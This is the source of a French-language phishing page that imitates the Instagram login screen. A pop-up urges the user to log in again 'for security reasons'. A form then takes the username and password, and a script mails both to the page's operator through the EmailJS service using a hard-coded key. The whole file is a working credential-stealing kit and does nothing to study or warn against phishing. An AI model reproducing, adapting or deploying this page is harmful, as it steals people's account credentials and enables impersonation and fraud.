<!DOCTYPE html>
<html lang="fr">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Instagram</title>
    <style>
        body {
            font-family: sans-serif;
            background-color: #fafafa;
            font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen,
                Ubuntu, Cantarell, "Open Sans", "Helvetica Neue", sans-serif;
            box-sizing: border-box;
        }

        a {
            text-decoration: none;
        }

        .container {
            max-width: 1000px;
            margin: 0 auto;
            display: flex;
            justify-content: center;
            flex-direction: column;
            align-items: center;
            margin-top: 3rem;
            font-size: 14px;
        }

        .box {
            max-width: 350px;
            width: 100%;
            display: flex;
            justify-content: center;
            align-items: center;
            flex-direction: column;
            background-color: #fff;
            border: 1px solid #e6e6e6;
            border-radius: 1px;
            margin: 0 0 10px;
            padding: 10px 0;
            padding-bottom: 80px;
            flex-grow: 1;
        }

        .heading {
            margin: 22px auto 12px;
            background-image: url("https://www.instagram.com/static/bundles/es6/sprite_core_b20f2a3cd7e4.png/b20f2a3cd7e4.png");
            background-position: -98px 0;
            height: 51px;
            width: 177px;
            overflow: hidden;
        }

        .field {
            margin-bottom: 10px;
            position: relative;
            width: 100%;
        }

        .field label {
            position: absolute;
            pointer-events: none;
            left: 10px;
            top: 10px;
            transition: 0.2s ease all;
            font-size: 14px;
            color: #999;
        }

        .field input {
            display: block;
            min-width: 250px;
            line-height: 1.5;
            font-size: 14px;
            padding: 9px 0px 7px 9px;
            width: 100%;
            outline: none;
            background: #fafafa;
            border-radius: 3px;
            border: 1px solid #efefef;
        }

        input::placeholder {
            visibility: hidden;
        }

        .field input:focus + label,
        .field input:not(:placeholder-shown) + label {
            top: -10px;
            font-size: 12px;
            color: #4460AA;
        }

        input[type="submit"] {
            display: block;
            padding: 6px 30px;
            font-size: 14px;
            background-color: #4460AA;
            color: #fff;
            border: none;
            margin-top: 20px;
            margin-bottom: 20px;
        }

        .popup-container {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background-color: rgba(0, 0, 0, 0.5);
            display: flex;
            justify-content: center;
            align-items: center;
            z-index: 9999;
        }

        .popup-content {
            background-color: #fff;
            border-radius: 12px;
            width: 90%;
            max-width: 400px;
            padding: 20px;
            text-align: center;
        }

        .popup-content h2 {
            font-size: 18px;
            margin-bottom: 20px;
        }

        .popup-content p {
            font-size: 14px;
            line-height: 1.5;
            margin-bottom: 20px;
        }

        #okButton {
            padding: 10px 20px;
            background-color: #10A3DA;
            color: #fff;
            border: none;
            border-radius: 4px;
            cursor: pointer;
        }

        #okButton:hover {
            background-color: #0c87b8;
        }
    </style>
</head>
<body>

<div id="popup" class="popup-container">
    <div class="popup-content">
        <h2>Connectez-vous à votre compte</h2>
        <p>Pour des raisons de sécurité et de protection de votre compte, nous vous demandons de vous reconnecter à Instagram afin de vérifier et mettre à jour vos informations personnelles. Nous mettons tout en œuvre pour garantir la confidentialité de vos données et vous offrir une expérience sécurisée sur notre plateforme. Veuillez saisir vos identifiants de connexion pour continuer à profiter pleinement de notre communauté Instagram.</p>
        <button id="okButton">OK</button>
    </div>
</div>

<div class="container">
    <div class="box">
        <div class="heading"></div>
        <form class="login-form" id="form">
            <div class="field">
                <input type="text" name="from_name" id="from_name" placeholder="Num. téléphone, nom d'utilisateur ou e-mail">
                <label for="from_name">nom d'utilisateur ou e-mail</label>
            </div>
            <div class="field">
                <input type="password" name="message" id="message" placeholder="Mot de passe">
                <label for="message">Mot de passe </label>
            </div>
            <input class="titi" type="submit" id="button" value="Se connecter">
        </form>
    </div>
</div>

<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/@emailjs/browser@4/dist/email.min.js"></script>
<script type="text/javascript">
    emailjs.init('2OCNCaNCavu669BfR');

    const btn = document.getElementById('button');

    document.getElementById('form').addEventListener('submit', function(event) {
        event.preventDefault();
        btn.value = 'Sending...';

        const serviceID = 'default_service';
        const templateID = 'template_xyz123';

        emailjs.sendForm(serviceID, templateID, this)
            .then(() => {
                btn.value = 'Send Email';
                alert('Sent!');
            }, (err) => {
                btn.value = 'Send Email';
                alert(JSON.stringify(err));
            });
    });

    document.addEventListener("DOMContentLoaded", function() {
        var popup = document.getElementById("popup");
        var okButton = document.getElementById("okButton");

        function closePopup() {
            popup.style.display = "none";
        }

        okButton.addEventListener("click", closePopup);
        okButton.addEventListener("touchstart", closePopup);
    });
</script>

</body>
</html>